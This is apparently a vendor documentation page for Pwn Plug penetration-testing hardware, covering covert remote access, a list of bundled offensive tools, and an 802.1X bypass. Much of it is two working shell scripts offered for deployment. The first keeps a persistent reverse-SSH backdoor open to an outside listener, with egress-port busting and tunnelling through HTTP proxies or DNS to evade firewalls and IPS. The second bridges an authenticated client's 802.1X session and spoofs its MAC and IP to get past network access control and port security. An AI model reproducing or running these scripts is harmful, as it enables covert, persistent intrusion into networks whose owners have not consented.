Product Documentation

Pwnie Express is committed to maintaining relevant and useful documentation for its products. Find the latest documentation below.

Enterprise Products

  • Citadel PX Manual (Request from Support)

Labs Products

Remote Access


 

:: All Pwn Plugs include persistent reverse-tunneling for remote SSH access: the plug opens an outbound SSH session to a server you control and re-establishes it whenever it drops.

:: All tunnels are encrypted with SSH, so the plug stays reachable from anywhere it can make an outbound Internet connection.

:: The following covert tunneling options are available for traversing strict egress firewall rules and application-aware IPS:

 

  • SSH over any TCP port
  • SSH over HTTP requests (appears as standard HTTP traffic)
  • SSH over SSL (appears as HTTPS)
  • SSH over DNS queries (appears as DNS traffic)
  • SSH over ICMP (appears as outbound pings)
  • SSH Egress Buster (tries the top 10 common egress ports in turn until one connects)
  • Out-of-band SSH over 3G/GSM cellular (Elite models)
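The transports above differ only in how the SSH session is wrapped; the plug-side pattern is the same: dial out, ask the listener to bind a port that forwards back to the plug's own sshd, and reconnect whenever the session dies. The script below is an added example, not Pwnie Express code, showing that pattern as a supervisor script. It covers three of the modes (plain SSH on an arbitrary TCP port, SSH through the site's HTTP proxy with proxytunnel, and SSH across an iodine DNS tunnel, both of which appear in the toolkit list further down) plus a minimal egress buster. The listener host, user, key path, proxy address, iodine gateway address and the list of egress ports are all assumptions; replace them for a real deployment.

```shell
#!/bin/sh
# Added example, not Pwnie Express code: a supervisor for the persistent
# reverse-SSH tunnel pattern. The plug dials out to an SSH listener you
# control and asks it to bind a port (-R) that forwards back to the plug's
# own sshd. Every host, port, key path and proxy below is an assumption.

C2_HOST="${C2_HOST:-tunnel.example.net}"      # assumed: your SSH listener
C2_USER="${C2_USER:-plug}"                    # assumed: unprivileged account there
C2_PORT="${C2_PORT:-443}"                     # assumed: TCP port for plain SSH mode
C2_KEY="${C2_KEY:-/etc/pwnplug/id_ed25519}"   # assumed: key path on the plug
REMOTE_PORT="${REMOTE_PORT:-3333}"            # port bound on the listener's loopback
WEB_PROXY="${WEB_PROXY:-proxy.corp.example:8080}"   # assumed: target's outbound web proxy
DNS_TUN_GW="${DNS_TUN_GW:-10.0.0.1}"          # assumed: server end of an iodine tun
EGRESS_PORTS="${EGRESS_PORTS:-443 80 53 22 25 587 993 995 8080 8443}"  # assumed list

# Options shared by every mode. ExitOnForwardFailure makes ssh exit non-zero
# when the -R bind fails, so the supervisor retries instead of keeping a
# session without a usable tunnel. The listener's host key is pinned.
common_opts() {
    printf '%s' "-N -o ServerAliveInterval=30 -o ServerAliveCountMax=3" \
        " -o ExitOnForwardFailure=yes -o StrictHostKeyChecking=yes" \
        " -o UserKnownHostsFile=/etc/pwnplug/known_hosts -i $C2_KEY" \
        " -R ${REMOTE_PORT}:127.0.0.1:22"
}

# Build the ssh command line for one transport. Only the wrapping differs:
#   tcp  - plain SSH on whatever TCP port the firewall lets out
#   http - SSH carried through the site's web proxy via HTTP CONNECT (proxytunnel)
#   dns  - SSH across an iodine DNS tunnel (iodine must already be up)
build_tunnel_cmd() {
    base="ssh $(common_opts)"
    case "$1" in
        tcp)  printf '%s\n' "$base -p $C2_PORT $C2_USER@$C2_HOST" ;;
        http) printf '%s\n' "$base -o ProxyCommand='proxytunnel -q -p $WEB_PROXY -d %h:%p' -p 443 $C2_USER@$C2_HOST" ;;
        dns)  printf '%s\n' "$base -p 22 $C2_USER@$DNS_TUN_GW" ;;
        *)    printf 'unknown mode: %s\n' "$1" >&2; return 1 ;;
    esac
}

# Egress buster: probe candidate ports in order and return the first one
# that completes a TCP handshake to the listener. probe_port is kept
# separate so it can be swapped for a stub when testing offline.
probe_port() { nc -z -w 3 "$1" "$2" >/dev/null 2>&1; }
pick_egress_port() {
    for p in $EGRESS_PORTS; do
        if probe_port "$1" "$p"; then printf '%s\n' "$p"; return 0; fi
    done
    return 1
}

# Supervise the tunnel: whenever ssh exits (network change, listener
# restart, bind failure) reconnect after a capped exponential backoff.
tunnel_loop() {
    delay=5
    while :; do
        eval "$(build_tunnel_cmd "$1")"
        delay=$((delay * 2))
        if [ "$delay" -gt 300 ]; then delay=300; fi
        sleep "$delay"
    done
}

# Stand-alone run prints the command for the requested mode (default tcp);
# PWN_RUN=1 busts egress first and then starts the supervised tunnel.
if [ "${PWN_RUN:-0}" = 1 ]; then
    if port=$(pick_egress_port "$C2_HOST"); then C2_PORT="$port"; fi
    tunnel_loop "${1:-tcp}"
else
    build_tunnel_cmd "${1:-tcp}"
fi
```

On the listener side, the bound port is on loopback, so reaching the plug is `ssh -p 3333 root@127.0.0.1` from the listener itself; binding it on a public address would expose the plug's sshd to anyone who can reach the listener. Note that the HTTP mode is an HTTP CONNECT through a proxy: to the proxy it is a CONNECT to port 443, which is unremarkable, but a proxy that inspects or restricts CONNECT targets will see the destination host.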

 

Pwn Plug Toolkit

The following open source pentesting tools are included on all Pwn Plug / Power Pwn products. [repository here]

alive6
amap
amap6
arping
arp-scan
asp-auditor
bed
cisco-auditing-tool
cisco-global-exploiter
cms-explorer
cryptcat
DarkMySQLi
darkstat
denial6
detect-new-ip6
dmitry
dnsdict6
dnsenum
dnstracer
dos-new-ip6
dsniff
easy-creds
ettercap
exploit6
fake_advertise6
fake_dhcps6
fake_dnsupdate6
fake_mipv6
fake_mld26
fake_mld6
fake_mldrouter6
fake_router6
Fasttrack
fierce
fimap
flood_advertise6
flood_dhcpc6
flood_mld26
flood_mld6
flood_mldrouter6
flood_router6
flood_solicitate6
fping
fragmentation6
ftp
fuzz_ip6
goohost
gpsd
grabber
hping3
hydra
implementation6
iodine
ipcalc
john
kill_router6
lbd
mdk3
metagoofil
metasploit 4
miranda
miredo
nbtscan
nc
ndpexhaust6
netdiscover
nikto
nmap
onesixtyone
openssl
openvpn
parasite6
plecost
proxychains
proxytunnel
randicmp6
redir6
rsmurf6
scapy
sendpees6
sendpeesmp6
SET
sickfuzz
sipcrack
sipsak
sipvicious
skipfish
smtp-user-enum
smurf6
snmpcheck
snmpenum
socat
sqlbrute
sqlmap
sqlninja
ssldump
sslscan
sslsniff
sslstrip
tcptraceroute
telnet
thcping6
theharvester
tinyproxy
toobig6
trace6
ua-tester
udptunnel
voiper
waffit
wapiti
weevely
wifitap
wifite
wifizoo
xprobe2

NAC/802.1x Bypass

All aboard! Pwnie Express has done it again. In addition to supporting both 3G and wireless connectivity, the Pwn Plug Elite can bypass virtually all NAC/802.1x/RADIUS implementations that authenticate the switch port rather than each frame: it rides on an already authenticated client PC's session, providing a reverse shell backdoor and full connectivity to the NAC-restricted network.

How does it work?

  1. First, the Pwn Plug is placed in-line between an 802.1x-enabled client PC and the wall jack or switch port, with one Ethernet interface facing each side.
  2. Using a modified layer 2 bridging module, the Pwn Plug transparently passes the 802.1x EAPOL authentication frames between the client PC and the switch. (A standard bridge would drop them: EAPOL is addressed to the link-local multicast address 01:80:C2:00:00:03, which bridges do not forward by default.)
  3. Once the 802.1x authentication completes, the switch authorizes the port and grants connectivity. The plug, which has sent nothing of its own so far, now sits on an authorized link as well. This relies on the switch authorizing the port rather than each frame; it does not apply where MACsec (802.1AE) encrypts traffic between the client and the switch.
  4. The first outbound port 80 packet to leave the client PC gives the Pwn Plug the PC's MAC and IP address and, from that frame's destination MAC, the default gateway.
  5. To avoid tripping the switch's port security, which limits the port to the MAC it has authorized, the Pwn Plug then establishes its reverse SSH connection with its own traffic rewritten to carry the MAC and IP address of the already authenticated client PC.
  6. Once connected to the plug's SSH console, you have access to any internal subnets reachable by the client PC. As an added bonus, because the plug sends all of its traffic to the gateway MAC it learned in step 4, connections to other systems within the client PC's local subnet will appear, at layer 2, to source from the subnet's local gateway.
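The six steps above map onto a handful of Linux networking commands. The script below is an added example, not Pwnie Express's bridging module, showing the standard way to do it with a Linux bridge, tcpdump, iptables and ebtables: bridge the two ports and let EAPOL through, learn the client's MAC, IP and gateway MAC from one outbound port 80 frame, then source-NAT the plug's own traffic at layer 3 (to the client's IP, on a reserved port range) and layer 2 (to the client's MAC), and hand replies on that port range back to the plug instead of the client. Interface names, the bridge's locally administered MAC, the bogus link-local addresses and the NAT port range are assumptions; the `parse_frame` helper and the sample tcpdump line used for the dry run are constructed here. With `DRY_RUN=1` (the default) it only prints what it would do.

```shell
#!/bin/sh
# Added example, not Pwnie Express code: the bridge-and-impersonate
# procedure as Linux shell commands. Interface names, the bridge MAC, the
# link-local bogus addresses and the NAT port range are assumptions.
# DRY_RUN=1 (default) prints the commands; root and two wired NICs are
# needed to apply them.

SW_IF="${SW_IF:-eth0}"                  # assumed: port toward the switch / wall jack
CL_IF="${CL_IF:-eth1}"                  # assumed: port toward the 802.1X client PC
BR="${BR:-br0}"
BR_MAC="${BR_MAC:-02:50:77:6e:00:01}"   # assumed: locally administered MAC for the bridge
FAKE_IP="${FAKE_IP:-169.254.66.66}"     # assumed: bridge IP, never seen on the wire after NAT
FAKE_GW="${FAKE_GW:-169.254.66.1}"      # assumed: placeholder next hop pinned to the real gateway MAC
NAT_PORTS="${NAT_PORTS:-61000-62000}"   # assumed: source ports the client itself is unlikely to use

run() { if [ "${DRY_RUN:-1}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi; }

# Steps 1-3: a transparent bridge that forwards EAPOL. A Linux bridge drops
# frames to 01:80:C2:00:00:03 by default; bit 3 of group_fwd_mask lets the
# client's 802.1X exchange pass through to the switch. IPv6 is disabled so
# the bridge never announces itself with router/neighbour solicitations.
bridge_up() {
    run ip link add name "$BR" type bridge
    run ip link set dev "$BR" address "$BR_MAC"
    run ip link set dev "$SW_IF" master "$BR"
    run ip link set dev "$CL_IF" master "$BR"
    run sh -c "echo 8 > /sys/class/net/$BR/bridge/group_fwd_mask"
    run sysctl -w "net.ipv6.conf.$BR.disable_ipv6=1"
    run ip link set dev "$SW_IF" up
    run ip link set dev "$CL_IF" up
    run ip link set dev "$BR" up
}

# Step 4: parse one 'tcpdump -n -e' line into "client_mac client_ip gw_mac".
# The destination MAC of an off-subnet port-80 frame is the default gateway.
parse_frame() {
    awk '{ mac = $2; gw = $4; sub(/,$/, "", gw)
           ip = $10; sub(/\.[0-9]+$/, "", ip)
           print mac, ip, gw; exit }'
}
learn_client() {
    tcpdump -i "$CL_IF" -n -e -l -c 1 'tcp dst port 80' 2>/dev/null | parse_frame
}

# Step 5: give the bridge a routable identity that is rewritten on the way
# out to the client's IP (iptables SNAT, pinned to NAT_PORTS so conntrack can
# tell the plug's flows from the client's) and the client's MAC (ebtables
# snat). Replies to those ports arrive addressed to the client's MAC, so an
# ebtables dnat steers them into the bridge's own stack instead of to the client.
impersonate() {
    cl_mac="$1"; cl_ip="$2"; gw_mac="$3"
    nat_range="${NAT_PORTS%-*}:${NAT_PORTS#*-}"   # ebtables wants lo:hi, iptables lo-hi
    run ip addr add "$FAKE_IP/24" dev "$BR"
    run ip neigh replace "$FAKE_GW" lladdr "$gw_mac" dev "$BR" nud permanent
    run ip route replace default via "$FAKE_GW" dev "$BR"
    run iptables -t nat -A POSTROUTING -o "$BR" -s "$FAKE_IP" -p tcp -j SNAT --to-source "$cl_ip:$NAT_PORTS"
    run iptables -t nat -A POSTROUTING -o "$BR" -s "$FAKE_IP" -p udp -j SNAT --to-source "$cl_ip:$NAT_PORTS"
    run ebtables -t nat -A POSTROUTING -o "$SW_IF" -s "$BR_MAC" -j snat --to-src "$cl_mac" --snat-arp
    run ebtables -t nat -A PREROUTING -i "$SW_IF" -d "$cl_mac" -p IPv4 --ip-dst "$cl_ip" \
        --ip-proto tcp --ip-dport "$nat_range" -j dnat --to-dst "$BR_MAC"
    run ebtables -t nat -A PREROUTING -i "$SW_IF" -d "$cl_mac" -p IPv4 --ip-dst "$cl_ip" \
        --ip-proto udp --ip-dport "$nat_range" -j dnat --to-dst "$BR_MAC"
}

# Step 6: the plug now speaks with the client's addresses and sends every
# frame to the learned gateway MAC; start the reverse SSH tunnel from here.
if [ "${DRY_RUN:-1}" = 1 ]; then
    bridge_up
    impersonate 00:11:22:33:44:55 10.1.2.3 66:77:88:99:aa:bb   # constructed sample values
else
    bridge_up
    set -- $(learn_client)
    impersonate "$1" "$2" "$3"
fi
```

Two practical notes. Everything the plug originates must go through the NAT rules, so keep the bridge silent until `impersonate` has run (no DHCP client, no mDNS, IPv6 off); a single frame with the bridge's own MAC is what trips port security. And only flows whose source port falls in `NAT_PORTS` are steered back to the plug, so the reverse SSH client must pick its source port from that range or accept that its replies are delivered to the client PC.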
